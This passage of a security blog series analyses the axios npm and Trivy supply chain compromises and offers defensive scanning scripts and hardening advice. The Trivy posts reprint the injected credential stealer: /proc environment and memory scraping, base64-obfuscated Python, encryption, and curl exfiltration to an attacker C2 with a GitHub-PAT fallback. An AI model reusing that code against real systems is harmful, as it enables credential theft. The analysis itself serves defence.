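    'plain-crypto-js|axios-(1\.14\.1|0\.30\.4)\.tgz|axios[@/](1\.14\.1|0\.30\.4)' {} + \
    || true
}

# Example: scan_lockfiles ~/code
```

Any path it prints deserves a closer look by hand before you decide the machine is clean or compromised.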

Disable postinstall scripts. Add ignore-scripts=true to ~/.npmrc. When a package legitimately needs a postinstall hook for native compilation, run npm rebuild explicitly after reviewing the script. This single setting would have stopped the entire attack chain.
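A minimal sketch of applying that setting without clobbering an existing file. ensure_ignore_scripts is a hypothetical helper name. Running npm config set ignore-scripts true should get you to the same place if you’d rather let npm edit the file.

```shell
# Sketch only: add ignore-scripts=true to an npmrc file if no ignore-scripts
# line is present. ensure_ignore_scripts is a hypothetical helper name.
ensure_ignore_scripts() {
  local npmrc="${1:-$HOME/.npmrc}"
  touch "$npmrc"
  # Leave any existing ignore-scripts line alone so it can be reviewed by hand.
  if grep -qE '^[[:space:]]*ignore-scripts[[:space:]]*=' "$npmrc"; then
    return 0
  fi
  # Make sure the file ends with a newline before appending.
  if [ -n "$(tail -c 1 "$npmrc")" ]; then
    printf '\n' >> "$npmrc"
  fi
  printf 'ignore-scripts=true\n' >> "$npmrc"
}

# Example: ensure_ignore_scripts            # defaults to ~/.npmrc
```

Note that it deliberately does not flip an existing ignore-scripts=false line; that one is worth a human decision.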

Monitor for osascript spawned by node. There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.
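If you don’t have an EDR rule for this yet, here is a rough point-in-time sketch of the ancestry check using a process listing. osascript_under_node is a hypothetical helper name, and it assumes input shaped like the output of ps -axo pid=,ppid=,comm=. It is no replacement for real telemetry: once the parent processes exit, a nohup’d child gets reparented and the chain is gone from the snapshot.

```shell
# Sketch only: read "pid ppid command" lines on stdin and print the PID of
# every osascript process with a node process somewhere in its ancestry.
# osascript_under_node is a hypothetical helper name.
osascript_under_node() {
  awk '
    {
      pid = $1; ppid = $2
      # Rebuild the command (it may contain spaces) and keep its basename.
      cmd = $0
      sub(/^[ \t]*[0-9]+[ \t]+[0-9]+[ \t]+/, "", cmd)
      n = split(cmd, parts, "/")
      name[pid] = parts[n]
      parent[pid] = ppid
    }
    END {
      for (pid in name) {
        if (name[pid] != "osascript") continue
        # Walk up the parent chain; the hop limit guards against cycles.
        p = parent[pid]
        for (hops = 0; hops < 64 && (p in name); hops++) {
          if (name[p] == "node") { print pid; break }
          p = parent[p]
        }
      }
    }
  '
}

# Example: ps -axo pid=,ppid=,comm= | osascript_under_node
```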

The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm’s default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every npm install into an implicit trust decision across hundreds of packages maintained by people you’ve never met. The Axios maintainer account was compromised for three hours. That was enough.

This is the third post in a series on software supply chain attacks. The previous posts covered the Trivy ecosystem compromise and the limits of SHA pinning. Joe Desimone’s technical analysis of the axios compromise is worth reading in full.


SHA Pinning Is Not Enough

2026-03-24T00:00:00+00:00

A few days ago I wrote about how the Trivy ecosystem got turned into a credential stealer. One of my takeaways was “pin by SHA.” Every supply chain security guide says it, I’ve said it, every subreddit says it, and the GitHub Actions hardening docs say it.

The Trivy attack proved it wrong, and I think we need to talk about why.

Quick Refresher

For anyone not familiar, SHA pinning looks like this:

# Tag reference (mutable, dangerous)
- uses: actions/checkout@v6.0.2

# SHA-pinned (immutable, safe... right?)
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2

Git tags are just pointers, so anyone with write access can move a tag to a different commit. SHAs are cryptographic hashes of the commit content. You can’t forge one and you can’t move one. Pin to a SHA and you get exactly the code you reviewed, forever.

That logic is correct, but it’s not the whole picture.

What Actually Happened

On March 4, commit 1885610c landed in aquasecurity/trivy. The message said fix(ci): Use correct checkout pinning, attributed to DmitriyLewen (a legitimate maintainer). The diff touched two workflow files across 14 lines. Most of it was noise: single quotes swapped for double quotes, a trailing space removed from a mkdir line. The kind of commit that gets waved through review because there’s nothing to review.

Two lines mattered. The first swapped the actions/checkout SHA in the release workflow:

-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2

The # v6.0.2 comment stayed. The SHA changed. The second change added --skip=validate to the GoReleaser invocation, disabling integrity checks on the build artifacts.

The payload lived at the other end of that SHA. Commit 70379aad sits in the actions/checkout repository as an orphaned commit. Someone had forked actions/checkout, created a commit with malicious code, and walked away. GitHub’s UI actually flags it with a yellow banner: “This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.” The author is listed as Guillermo Rauch (spoofed), the commit message references PR #2356 (a real, closed PR by a GitHub employee), and the commit is unsigned. Every bit of metadata is designed to look routine at a glance.

Here’s the part that should bother you: GitHub’s architecture makes fork commits reachable by SHA from the parent repo. When GitHub Actions resolved actions/checkout@70379aad..., it fetched the commit, found valid code, and ran it. No warning in the run log. No signal that this commit came from outside the repository’s branch history. As far as the runtime was concerned, it was a totally normal commit in actions/checkout.

Anyone can do this right now. Fork a popular action, create a commit with whatever code you want, and produce a SHA that GitHub will resolve as if it belongs to the original repository. SHA pinning guarantees you get the same commit every time. It does not guarantee that commit was ever part of the upstream project.

Nobody Reads Hex Strings

The malicious checkout replaced action.yml’s Node.js entrypoint with a composite action that did a legitimate checkout first, then silently pulled down replacements for the Trivy source:

- name: "Setup Checkout"
  shell: bash
  run: |
    BASE="https://scan.aquasecurtiy.org/static"
    curl -sf "$BASE/main.go" -o cmd/trivy/main.go &> /dev/null
    curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &> /dev/null
    curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &> /dev/null
    curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &> /dev/null
    curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &> /dev/null

Four Go files from a typosquatted C2, dropped into cmd/trivy/, replacing the real source. A fifth download replaced .golangci.yaml to disable linter rules that would have flagged the injected code. GoReleaser ran with validation skipped, built binaries from the poisoned source, and published them as v0.69.4 through Trivy’s own release infrastructure. The malware was compiled in. No runtime download, no shell script, no base64.

But none of that is visible from the Trivy repository side. What a reviewer actually sees is this:

-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2

Two 40-character hex strings, both ending with # v6.0.2. Be honest: you didn’t compare them character by character just now. Neither did anyone reviewing that commit. The version comment is the thing people actually read, and the version comment is just a freeform string that anybody can type.

SHA pinning optimizes for machine verification but falls apart at the moment a human has to review a change. The attacker knew this, which is why the rest of the 14-line diff was cosmetic noise. Hide the important thing behind boring things, and the reviewer’s attention goes to the boring things.
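Since humans won’t compare hex strings, a machine can at least point at the lines that deserve a second look. This is a rough sketch, not a vetted tool: it scans a unified diff for pins where the SHA changed while the trailing comment stayed the same. The function name silent_sha_swaps and the regex are my own assumptions about how pins are usually written.

```python
import re

# Matches a diff line like: "-   uses: owner/repo@<40 hex> # v1.2.3"
PIN = re.compile(r"^([+-])\s*(?:-\s*)?uses:\s*(\S+)@([0-9a-f]{40})\s*#\s*(\S+)")


def silent_sha_swaps(diff: str) -> list[tuple[str, str, str, str]]:
    """Return (action, label, old_sha, new_sha) where the SHA moved but the comment did not."""
    removed = {}
    swaps = []
    for line in diff.splitlines():
        match = PIN.match(line)
        if not match:
            continue
        sign, action, sha, label = match.groups()
        if sign == "-":
            removed[(action, label)] = sha
        elif (action, label) in removed and removed[(action, label)] != sha:
            swaps.append((action, label, removed[(action, label)], sha))
    return swaps
```

A legitimate version bump changes both the SHA and the comment, so it produces no finding. The Trivy diff above produces exactly one.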

The Comment That Lied

There’s a convention that’s emerged with SHA pinning where you put the version tag in a comment next to the SHA so humans can tell what version they’re using:

- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2

That comment is free text. Nothing validates it. No tool in the GitHub Actions pipeline checks that the SHA actually corresponds to v6.0.2. Dependabot and Renovate verify tag-to-SHA mappings when they make updates, but they can’t protect against someone hand-editing a SHA and typing whatever they want in the comment. In this case, the commit came from a maintainer account (or at least one with write access), so it sailed right past branch protection.
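Validating the comment is not hard once you have a trusted tag-to-SHA mapping. The sketch below assumes you already hold that mapping (from a mirrored repo, an API lookup, or a vendored list) and only shows the comparison. lying_comments and tag_shas are hypothetical names.

```python
import re

# Captures action, 40-character SHA, and the version label from the trailing comment.
USES = re.compile(r"uses:\s*(\S+)@([0-9a-f]{40})\s*#\s*(\S+)")


def lying_comments(workflow: str, tag_shas: dict[tuple[str, str], str]) -> list[str]:
    """List pins whose comment names a tag that resolves to a different SHA.

    tag_shas maps (action, tag) to the commit SHA you trust for that tag.
    """
    problems = []
    for action, sha, tag in USES.findall(workflow):
        expected = tag_shas.get((action, tag))
        if expected is None:
            problems.append(f"{action}@{sha[:8]}: no trusted SHA recorded for {tag}")
        elif expected != sha:
            problems.append(f"{action}@{sha[:8]}: comment says {tag}, which is {expected[:8]}")
    return problems
```

Run it over every workflow file in CI and fail the job on a non-empty result. That turns the comment from free text into something a machine enforces.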

The comment # v6.0.2 was the entire social engineering payload on the Trivy repository side. Not a phishing email, not a fake login page. Eight characters in a YAML comment that made a reviewer’s brain skip right past the hex string next to it.

What Actually Helps

SHA pinning is still better than tag references. It knocks out one class of attack (tag mutation) entirely. But treating it as “good enough” is where things fall apart.

The fork commit problem is the most immediate thing you can act on. Before you accept a SHA change in a PR, click through to the commit in the target repository. For actions/checkout@70379aad..., that would have shown GitHub’s yellow “does not belong to any branch” banner. That’s a hard no. Any SHA pin for a GitHub Action should point to a commit that lives on a release branch or tag in the official repo, not an orphaned commit from some fork. You can automate part of this check with the GitHub API: repos/{owner}/{repo}/commits/{sha}/branches-where-head returns an empty list for orphaned commits. It also returns an empty list for any commit that is not the current tip of a branch, so treat an empty result as a reason to confirm the SHA against the project’s release tags rather than as proof of tampering.
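One way to ask the ancestry question directly is GitHub’s compare endpoint, which reports how a head commit relates to a base ref. This is a sketch under assumptions: the helper names are mine, the trusted ref (a release tag or branch) is something you choose, and I have not verified how the endpoint behaves for every fork-network edge case.

```python
import json
import urllib.request

API = "https://api.github.com"


def compare_url(owner: str, repo: str, ref: str, sha: str) -> str:
    """Compare endpoint URL with the trusted ref as base and the pinned SHA as head."""
    return f"{API}/repos/{owner}/{repo}/compare/{ref}...{sha}"


def reachable_from_ref(status: str) -> bool:
    """A head that is 'identical' to or 'behind' the base is an ancestor of the base.

    'ahead' or 'diverged' means the SHA carries commits the trusted ref lacks.
    """
    return status in {"identical", "behind"}


def pin_is_on_ref(owner: str, repo: str, ref: str, sha: str) -> bool:
    """Network call. Unauthenticated requests are rate limited."""
    request = urllib.request.Request(
        compare_url(owner, repo, ref, sha),
        headers={"Accept": "application/vnd.github+json"},
    )
    with urllib.request.urlopen(request) as response:
        return reachable_from_ref(json.load(response)["status"])
```

A pin that is not reachable from any release tag or default branch of the official repo is the automated equivalent of the yellow banner.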

Beyond that, the usual layers apply: require signed commits on workflow file changes, restrict allowed actions at the org level to an explicit allowlist, mirror the actions you depend on into your own org so fork reachability doesn’t apply, and verify build artifact provenance with artifact attestations rather than trusting whatever came out of CI.

The uncomfortable reality is that no single control would have stopped the Trivy attack. The commit came through a compromised maintainer account, so code review and branch protection were both present and both bypassed. The SHA pointed to a fork commit, so the pin itself was technically valid. GoReleaser validation was explicitly disabled, so the build system’s own integrity checks were stripped. Every control in the pipeline was individually subverted. The attack worked because nothing caught the chain.

This Is the Floor, Not the Ceiling

After the tj-actions/changed-files incident in early 2025, the security community converged on SHA pinning as the answer to GitHub Actions supply chain attacks. It was the right call, but it wasn’t the complete answer, and somewhere along the way the nuance got lost. “Pin your SHAs” turned into “pin your SHAs and you’re safe,” which is a very different statement.

Pin your SHAs. Then verify what they point to.

This is a follow-up to my earlier post on the Trivy supply chain compromise.


How a Typosquatted Domain and a Fake Version Tag Turned Trivy Into a Credential Stealer

2026-03-20T00:00:00+00:00

On March 19, 2026, someone (or some group) poisoned the Aqua Security Trivy ecosystem. A tool that thousands of organizations rely on to find vulnerabilities in their container images and configurations was quietly turned into a weapon that stole their secrets instead. I spent some time pulling apart the malicious code and cross-referencing findings from Wiz’s analysis, and figured the walkthrough was worth sharing. Here’s how it happened (and how a majority of the tech industry ignored the compromise because it was a Friday).

Two Days of Preparation

The first sign of what was coming appeared on March 17, when someone registered the domain aquasecurtiy.org through Spaceship, Inc. It’s “securtiy” with the i and t swapped, not “security.” The .org TLD instead of .com added another layer of plausible misdirection.

Within fifty minutes of registration, the attacker had Let’s Encrypt certificates issued for scan.aquasecurtiy.org. The server behind it sat on AS48090, a small network called DMZHOST operated by a UK-registered company with a Gmail abuse contact and IP space flagged to Andorra. The kind of hosting provider that doesn’t ask too many questions about what you’re running.

Two days of infrastructure prep. Then the real work began.

A Legitimate Version, Silently Hijacked

trivy-action 0.34.2 was a real release. It shipped in late February with YAML trivyignore support and a Trivy version bump. Organizations adopted it through normal Renovate and Dependabot PRs weeks before anything went wrong.

According to Wiz’s research, the group behind this (calling themselves “TeamPCP”) had compromised the aqua-bot service account through residual access from an earlier incident in March 2026 that was never fully contained. With that access, they didn’t just tamper with one tag. They force-pushed 75 of 76 trivy-action tags and 7 setup-trivy tags to malicious commits. The 0.34.2 tag caused the most damage in the wild because so many organizations had already adopted it as a legitimate upgrade.

On March 19 around 17:43 UTC, the attacker moved the 0.34.2 tag. It had pointed to a clean commit; now it resolved to a different one (ddb9da44) that looked nearly identical to the original. Same author name, same timestamp, same commit message. The attacker had spoofed the commit metadata to impersonate known developers. DmitriyLewen is a legitimate Aqua Security engineer. rauchg is Guillermo Rauch, the CEO of Vercel, who has nothing to do with Aqua Security but whose name on a commit touching GitHub Actions plumbing wouldn’t raise an eyebrow. The only differences were the parent chain (it branched off v0.35.0 instead of sitting on the main branch) and the contents of entrypoint.sh, which now had 105 lines of malicious code prepended to the legitimate Trivy logic.

This is the fundamental problem with Git tags: they’re just pointers. You can move them whenever you want, and anyone pulling that tag gets whatever it points to now, not what it pointed to yesterday. Every organization that had already pinned to 0.34.2 silently started pulling the attacker’s code with no change on their end.

Walking Through the Malicious Code

What makes this attack worth studying is its transparency. The 105 lines of malicious shell ran first, then handed off to the real Trivy scanner. Workflows completed successfully. Scans produced normal output. Nothing looked wrong unless you knew exactly where to look.

Here’s the actual injected code.

Phase 1: Harvesting Runner Process Environments

The first thing the payload does is find every GitHub Actions runner process on the box and read its environment variables straight out of /proc:

_COLLECT_PIDS="$$"
for _name in Runner.Worker Runner.Listener runsvc run.sh; do
  _PIDS=$(pgrep -f "$_name" 2>/dev/null || true)
  [ -n "$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"
done

COLLECTED="/tmp/runner_collected_$$.txt"
: > "$COLLECTED"

for _PID in $_COLLECT_PIDS; do
  _ENVIRON="/proc/${_PID}/environ"
  [ -r "$_ENVIRON" ] || continue
  while IFS= read -r line; do
    key="${line%%=*}"
    val="${line#*=}"
    if echo "$key" | grep -qiE '(env|ssh)'; then
      printf '%s=%s\n' "$key" "$val" >> "$COLLECTED"
      if [ -f "$val" ] && [ ! -S "$val" ]; then
        printf '\n[%s]\n' "$val" >> "$COLLECTED"
        cat "$val" >> "$COLLECTED"
        printf '\n' >> "$COLLECTED"
      fi
    fi
  done < <(tr '\0' '\n' < "$_ENVIRON")
done

It searches for four process names (Runner.Worker, Runner.Listener, runsvc, and run.sh), which cover every flavor of the GitHub Actions runner agent. For each one it finds, it reads /proc/PID/environ, which on Linux contains all of a process’s environment variables as null-delimited bytes. The tr '\0' '\n' converts those null bytes into newlines so the shell can iterate over them.

Then it gets clever. It doesn’t grab every variable. It filters for keys matching env or ssh, which catches things like SSH_PRIVATE_KEY, ENV_FILE, or anything a developer might have named with those substrings. And here’s the part that shows someone thought about this: if the value of an environment variable is a path to a file on disk, the script reads that file’s contents too. So if you have SSH_KEY_PATH=/home/runner/.ssh/id_ed25519, it doesn’t just log the path. It cats the actual private key into the collection file.

Phase 2: The Fork

After the environment harvest, the code branches based on where it’s running:

if [[ "$(uname)" == "Linux" && "$RUNNER_ENVIRONMENT" == "github-hosted" ]]; then
    PYTHON_STR='aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJl...'
    MEMORY_SECRETS=$(echo -n "$PYTHON_STR" | base64 -d | sudo python3 | \
      tr -d '\0' | \
      grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u)
    printf '%s=%s\n' "MEMORY_PARSE" "$MEMORY_SECRETS" >> "$COLLECTED"
else
    PYTHON_STR='aW1wb3J0IG9zLHN5cyxzdGF0LHN1YnByb2Nlc3Ms...'
    SHELL_RUNNER_GOODIES=$(echo -n "$PYTHON_STR" | base64 -d | python3)
    printf '%s=%s\n' "SHELL_GOODIES" "$SHELL_RUNNER_GOODIES" >> "$COLLECTED"
fi

Both paths hide their real logic inside base64-encoded Python payloads, a straightforward way to avoid static detection from anyone grepping the action source for suspicious keywords.

On GitHub-hosted runners, the decoded Python does something audacious. It walks /proc looking for the Runner.Worker process, then reads its memory map from /proc/PID/maps to find all readable memory regions, and reads the raw bytes out of /proc/PID/mem. It runs under sudo because accessing another process’s memory requires elevated privileges. The output gets piped through a regex that matches GitHub Actions’ internal secret storage format: "SECRET_NAME":{"value":"the_actual_secret","isSecret":true}. That’s how the runner keeps track of masked secrets in memory. Those *** masks in your logs? The actual values are right there in the runner process’s heap, and this script knows exactly what pattern to look for.

On self-hosted runners, the decoded Python is a comprehensive filesystem stealer. It’s long (really long) because it has hardcoded paths for basically every credential file that might exist on a Linux machine. When decoded from base64, it defines helper functions for reading files (emit), running commands (run), and walking directory trees (walk), then systematically works through SSH keys and configs from every home directory and /etc/ssh, git credentials, AWS/GCP/Azure credentials, every flavor of .env file walking up to 6 directories deep, cloud IMDS endpoints for both ECS and EC2, Kubernetes configs and service account tokens, Docker configs (including the Kaniko-specific path at /kaniko/.docker/config.json), NPM tokens, Vault tokens, database credentials for MySQL/PostgreSQL/MongoDB/Redis, WireGuard configs, Terraform .tfvars and .tfstate files, TLS private keys, Slack and Discord webhook URLs, and cryptocurrency wallets for Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero, Ethereum, Cardano, and Solana. It also grabs /etc/passwd, /etc/shadow, and auth logs for good measure.

The script ends with the comment ## TeamPCP Cloud stealer.

Phase 3: Encrypt and Exfiltrate

Once the collection phase finishes, the payload only continues if it actually found something (-s "$COLLECTED" checks the file isn’t empty). Then it sets up a hybrid encryption scheme:

if [ -s "$COLLECTED" ]; then
  _PUB_KEY_PEM="$(mktemp)"
  cat > "$_PUB_KEY_PEM" <<'PUBKEY'
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
...
-----END PUBLIC KEY-----
PUBKEY

  _WORKDIR="$(mktemp -d)"
  _SESSION_KEY="$_WORKDIR/session.key"
  _ENC_FILE="$_WORKDIR/payload.enc"
  _ENC_KEY="$_WORKDIR/session.key.enc"
  _BUNDLE="$_WORKDIR/tpcp.tar.gz"

  openssl rand 32 > "$_SESSION_KEY" 2>/dev/null
  openssl enc -aes-256-cbc -in "$COLLECTED" -out "$_ENC_FILE" \
    -pass "file:$_SESSION_KEY" -pbkdf2 2>/dev/null
  openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM" \
    -in "$_SESSION_KEY" -out "$_ENC_KEY" \
    -pkeyopt rsa_padding_mode:oaep 2>/dev/null
  tar -czf "$_BUNDLE" -C "$_WORKDIR" payload.enc session.key.enc 2>/dev/null

This is textbook hybrid encryption. A random 32-byte session key encrypts the collected data with AES-256-CBC (openssl treats the key file as a passphrase and stretches it with PBKDF2). Then the session key itself gets encrypted with the attacker’s embedded RSA-4096 public key using OAEP padding. Both ciphertext files get tarred into tpcp.tar.gz. Only someone holding the corresponding RSA private key can reverse this. Even if you intercept the bundle on the wire, the contents are opaque.

Phase 4: Phone Home (with a Backup Plan)

The exfiltration has a primary and fallback channel:

  _HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X POST \
    https://scan.aquasecurtiy.org \
    -H "Content-Type: application/octet-stream" \
    -H "X-Filename: tpcp.tar.gz" \
    --data-binary "@${_BUNDLE}" 2>/dev/null || echo "000")

  if [[ ! "$_HTTP" =~ ^2 ]] && [ -n "${INPUT_GITHUB_PAT:-}" ]; then
    _REPO="tpcp-docs"
    _GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"
    _GH_API="https://api.github.com"

    curl -s -X POST "${_GH_API}/user/repos" \
      -H "$_GH_AUTH" \
      -d '{"name":"'"${_REPO}"'","private":false,"auto_init":true}' \
      >/dev/null 2>&1 || true

    _GH_USER=$(curl -s -H "$_GH_AUTH" "${_GH_API}/user" 2>/dev/null \
      | grep -oE '"login"\s*:\s*"[^"]+"' | head -1 | sed 's/.*"\([^"]*\)"$/\1/')

    _TAG="data-$(date +%Y%m%d%H%M%S)"
    _RELEASE_ID=$(curl -s -X POST \
      "${_GH_API}/repos/${_GH_USER}/${_REPO}/releases" \
      -H "$_GH_AUTH" \
      -d '{"tag_name":"'"${_TAG}"'","name":"'"${_TAG}"'"}' \
      2>/dev/null | grep -oE '"id"\s*:\s*[0-9]+' | head -1 | grep -oE '[0-9]+')

    if [ -n "$_RELEASE_ID" ]; then
      curl -s -X POST \
        "https://uploads.github.com/repos/${_GH_USER}/${_REPO}/releases/${_RELEASE_ID}/assets?name=tpcp.tar.gz" \
        -H "$_GH_AUTH" \
        -H "Content-Type: application/octet-stream" \
        --data-binary "@${_BUNDLE}" >/dev/null 2>&1 || true
    fi
  fi

  rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"
fi
rm -f "$COLLECTED"

First it tries the C2 directly, a POST to scan.aquasecurtiy.org over TLS, looking like any other HTTPS traffic. The curl captures the HTTP status code. If the server responds with a 2xx, the job is done.

But if the C2 is down, unreachable, or returns an error, and the workflow happens to have a GitHub PAT available (which trivy-action accepts as the github-pat input, exposed to the script as INPUT_GITHUB_PAT), the fallback kicks in. It uses the victim’s own PAT to create a public repository called tpcp-docs on the victim’s GitHub account, creates a release tagged with the current timestamp, and uploads the encrypted bundle as a release asset. Your own credentials, exfiltrated through your own GitHub account, sitting in a public repo anyone can download from. The attacker just needs to watch for new tpcp-docs repos appearing on GitHub.

Wiz identified an additional fallback C2 at plug-tab-protective-relay.trycloudflare.com (a Cloudflare Tunnel), giving the attacker yet another exfiltration path if the primary domain went down.

Finally, cleanup. The temp directory, key files, and collection file all get deleted. The only trace left behind is whatever the runner’s process table recorded, which, as it turns out, was enough.

It Didn’t Stop at CI

Everything above describes the trivy-action shell script side. The binary side was a separate operation, and it started two weeks earlier.

On March 4, commit 1885610c landed in aquasecurity/trivy with the message fix(ci): Use correct checkout pinning, attributed to DmitriyLewen. The diff touched two workflow files across 14 lines, and most of it was noise: single quotes swapped for double quotes, a trailing space removed from a mkdir line. The kind of commit that passes review because there’s nothing to review.

Two lines mattered. The first swapped the actions/checkout SHA in the release workflow:

-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2

The # v6.0.2 comment stayed. The SHA changed. The second added --skip=validate to the GoReleaser invocation, telling it not to run integrity checks on the build artifacts.

The payload lived at the other end of that SHA. Commit 70379aad sits in the actions/checkout repository as an orphaned commit. GitHub’s UI flags it with a yellow banner: “This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.” The attacker created it in a fork of actions/checkout, but GitHub’s architecture makes fork commits reachable by SHA from the parent repo. The author is listed as Guillermo Rauch (spoofed, again), the commit message references PR #2356 (a real, closed pull request by a GitHub employee), and the commit is unsigned. Everything about it is designed to look routine if you only glance at the metadata.

The diff replaced action.yml’s Node.js entrypoint with a composite action. The composite action performs a legitimate checkout via the parent commit, then silently overwrites the Trivy source tree:

   - name: "Setup Checkout"
     shell: bash
     run: |
       BASE="https://scan.aquasecurtiy.org/static"
       curl -sf "$BASE/main.go" -o cmd/trivy/main.go &> /dev/null
       curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &> /dev/null
       curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &> /dev/null
       curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &> /dev/null
       curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &> /dev/null

Four Go files pulled from the same typosquatted C2 and dropped into cmd/trivy/, replacing the legitimate source. A fifth download replaced .golangci.yaml to disable linter rules that would have flagged the injected code. The C2 is no longer serving these files, so the exact contents can’t be independently verified, but the file names and Wiz’s behavioral analysis of the compiled binary tell the story: main.go bootstrapped the malware before the real scanner, scand.go carried the credential-stealing logic, and fork_unix.go/fork_windows.go handled platform-specific persistence.

When GoReleaser ran with validation skipped, it built binaries from this poisoned source and published them as v0.69.4 through Trivy’s own release infrastructure. No runtime download, no shell script, no base64. The malware was compiled in.

The malicious binary had a second mode. When it detected it was running outside of GitHub Actions (GITHUB_ACTIONS != "true"), it dropped a Python script to ~/.config/systemd/user/sysmon.py and created a systemd user unit to run it persistently. That script polled tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io (an ICP-hosted endpoint) every five minutes, downloading and executing whatever payload it received.

In other words: if a developer ran the compromised trivy binary locally (not in CI), they got a persistent backdoor installed on their workstation. The CI credential theft was the loud part of the attack. The quiet part was long-term access to developer machines.

The aqua-bot compromise also yielded GPG keys, Docker Hub credentials, Twitter account credentials, and Slack credentials for Aqua Security itself, which were exfiltrated to the Cloudflare Tunnel C2 endpoint.

The Tell

The one thing the attacker couldn’t fully hide was the exfiltration itself. The curl to the C2 ran as a background process while the legitimate Trivy scan continued in the foreground. When the GitHub Actions runner finished the job and cleaned up, it found this orphaned process still running and killed it:

Terminate orphan process: pid (2516) (curl)

That single log line, Terminate orphan process ... (curl), was the smoking gun. Compromised runs showed between one and four orphan curl processes depending on how many matrix jobs were in the workflow. If your Trivy workflow doesn’t use curl and you see that message in your logs from March 19, you have a problem.
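If you have exported run logs, hunting for that line is a one-regex job. A minimal sketch, assuming the message format matches the sample above exactly (orphan_processes is a hypothetical helper name):

```python
import re

# Format taken from the log line quoted above: "Terminate orphan process: pid (2516) (curl)"
ORPHAN = re.compile(r"Terminate orphan process: pid \((\d+)\) \(([^)]+)\)")


def orphan_processes(log_text: str, name: str = "curl") -> list[int]:
    """Return the PIDs of orphaned processes with the given name found in a run log."""
    return [int(pid) for pid, proc in ORPHAN.findall(log_text) if proc == name]
```

Any hit in a Trivy job that doesn’t call curl itself is worth escalating.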

The Cleanup

On March 20, Aqua Security re-published all 74 trivy-action releases within a 78-minute window. Roughly 97 trivy CLI releases were deleted from GitHub (tags still exist, but the releases are gone). The setup-trivy action was stripped to a single version. The malicious v0.69.4 CLI binary and the 0.34.2 tag were removed entirely.

The mass re-publishing means that for forensic purposes, the current tag-to-SHA mappings don’t reflect what those tags pointed to during the attack window. If you need to know what your runners actually pulled, the answer is in your GitHub Actions run logs, specifically the Download action repository line that records the resolved SHA at execution time.
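Pulling the resolved SHAs out of saved logs can be scripted. This sketch assumes the line looks like Download action repository 'owner/repo@ref' (SHA:<40 hex>), which is the format I have seen in runner logs; check it against your own logs before relying on it. resolved_actions is a hypothetical helper name.

```python
import re

# Assumed format: Download action repository 'owner/repo@ref' (SHA:<40 hex>)
DOWNLOAD = re.compile(
    r"Download action repository '([^'@]+)@([^']+)' \(SHA:([0-9a-f]{40})\)"
)


def resolved_actions(log_text: str) -> list[tuple[str, str, str]]:
    """Return (action, requested_ref, resolved_sha) for each action the runner downloaded."""
    return DOWNLOAD.findall(log_text)
```

Compare the resolved SHA for each trivy-action entry against a mapping you trust. The current upstream tags won’t tell you what ran during the attack window, but your logs will.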

Takeaways

The approximate exposure window was 2026-03-19 ~17:43 UTC through 2026-03-20 ~05:40 UTC, roughly twelve hours. If you ran trivy-action@0.34.2 during that window, assume every secret accessible to that workflow was exfiltrated and rotate accordingly.
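To triage a long list of workflow runs, a timestamp filter is enough. This sketch hardcodes the approximate window from the paragraph above and assumes timezone-aware ISO 8601 timestamps; the function name is mine. Because the bounds are approximate, consider padding them when you use this for real.

```python
from datetime import datetime, timezone

# Approximate bounds from the post, in UTC.
WINDOW_START = datetime(2026, 3, 19, 17, 43, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 3, 20, 5, 40, tzinfo=timezone.utc)


def in_exposure_window(started_at: str) -> bool:
    """started_at is a timezone-aware ISO 8601 timestamp, e.g. '2026-03-19T18:05:00Z'."""
    timestamp = datetime.fromisoformat(started_at.replace("Z", "+00:00"))
    return WINDOW_START <= timestamp <= WINDOW_END
```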

Stop using Trivy. This isn’t the first time Aqua Security’s infrastructure has been compromised, and the aqua-bot account that enabled this attack was reportedly left exposed from a previous incident earlier in March that was never fully contained. That’s not a one-off failure; it’s an organizational pattern. A security scanning tool that can’t secure its own supply chain is a liability, not an asset. Remove trivy-action from your workflows and the Trivy CLI from your toolchains.

If you can’t migrate immediately, pin by SHA. Git tags are mutable. A full commit SHA is the only reference an attacker can’t move:

# Vulnerable
- uses: aquasecurity/trivy-action@v0.35.0

# Pinned (but you should still be migrating off Trivy)
- uses: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1 # v0.35.0

